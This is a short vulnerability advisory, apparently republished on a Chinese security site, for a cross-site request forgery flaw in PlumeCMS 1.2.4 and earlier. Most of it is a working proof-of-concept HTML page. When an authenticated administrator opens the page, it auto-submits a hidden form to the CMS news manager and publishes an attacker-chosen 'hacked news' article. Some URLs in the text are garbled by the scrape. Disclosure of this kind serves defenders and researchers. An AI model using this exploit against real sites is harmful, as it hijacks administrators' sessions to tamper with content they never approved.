标题: PlumeCMS <= 1.2.4 CSRF Vulnerability 作者: Ivano Binetti (http://ivanobinetti测试数据) 下载 地址: http://sourceforge.net/projects/pxsystem/files/latest/download?source=directory 开发网站: http://pxsystem.sourceforge.net/ 影响版本: 1.2.4 最新版及更低版本 测试系统: Debian Squeeze (6.0) [Insert and publish NEWS by Ivano Binetti] Summary 1)缺陷描述 2)测试 1)缺陷描述 PlumeCMS is prone to a CSRF Vulnerability which allows an attacker to insert and publish "News" (as PlumeCMS names his articles) when an authenticated admin browses a web page containing the following html /javascript code. 2)测试 <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to add and publish News</H2> <form method="POST" name="form0" action="http://HdhCmsTest2cto测试数据 /plume/manager/news.php"> <input type="hidden" name="n_category_id" value="1"/> <input type="hidden" name="n_content_format" value="html"/> <input type="hidden" name="n_status" value="1"/> <input type="hidden" name="n_comment_support" value="1"/> <input type="hidden" name="n_subtype" value="2"/> <input type="hidden" name="n_title" value="hacked news"/> <input type="hidden" name="n_content" value="%3Cp%3Etest2%3C%2Fp%3E"/> <input type="hidden" name="n_subject" value=""/> <input type="hidden" name="n_titlewebsite" value=""/> <input type="hidden" name="n_linkwebsite" value=""/> <input type="hidden" name="publish" value="Save+%5Bs%5D"/> </form> </body> </html>
查看更多关于PlumeCMS <= 1.2.4 CSRF缺陷及修复 - 网站安全 - 自学的详细内容...